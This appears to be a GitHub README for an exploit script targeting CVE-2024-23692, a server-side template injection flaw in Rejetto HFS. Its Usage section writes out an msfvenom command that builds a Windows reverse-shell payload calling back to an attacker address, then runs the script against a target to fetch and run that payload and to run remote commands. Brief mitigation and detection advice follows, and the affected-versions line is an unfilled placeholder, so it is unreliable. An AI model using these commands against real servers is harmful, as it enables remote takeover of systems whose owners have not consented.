Rejetto HFS (HTTP File Server) CVE-2024-23692 Vulnerability


Overview

Rejetto HFS (HTTP File Server) is a simple web file server that facilitates file sharing over a network or the internet. Despite its ease of use and simplicity, a critical vulnerability (CVE-2024-23692) has been discovered, making the server a target for attackers.


CVE-2024-23692: Server-Side Template Injection (SSTI) Vulnerability


Description

CVE-2024-23692 is a Server-Side Template Injection (SSTI) vulnerability identified in Rejetto HFS. This vulnerability allows an attacker to inject and execute malicious templates on the server. If exploited, it can lead to remote code execution, potentially compromising the entire server and the data it hosts.


Impact

An attacker exploiting this vulnerability can:

  • Execute arbitrary code on the server
  • Gain unauthorized access to sensitive data
  • Compromise the integrity and availability of the server
  • Use the compromised server to launch further attacks within the network

Usage

Obtain a shell using a malicious binary created in msfvenom.

Note: Leave nc listening.

# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

Run a command remotely.

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

It may take approximately 15 seconds to display the result.

[Screenshot_2.png]


Affected Versions

All versions of Rejetto HFS up to and including version [insert latest vulnerable version here] are affected by this vulnerability.


Mitigation

To mitigate the risk posed by CVE-2024-23692, users are advised to:

  • Update to the latest version: Ensure you are using a version of Rejetto HFS where this vulnerability has been patched. Check the official Rejetto HFS website or repository for the latest updates.
  • Apply Security Best Practices: Restrict access to the HFS server to trusted networks and users only. Use strong authentication and authorization mechanisms.
  • Monitor and Audit: Regularly monitor the server for unusual activity and audit logs for signs of exploitation.

Detection

To determine if your server has been compromised, look for:

  • Unusual network traffic originating from the server
  • Unexpected files or processes on the server
  • Unauthorized changes to server configurations or data

Reporting and Assistance

For further assistance and support, refer to the Rejetto HFS community forums or the official support channels.


Resources


License

This project is licensed under the MIT License - see the LICENSE file for details.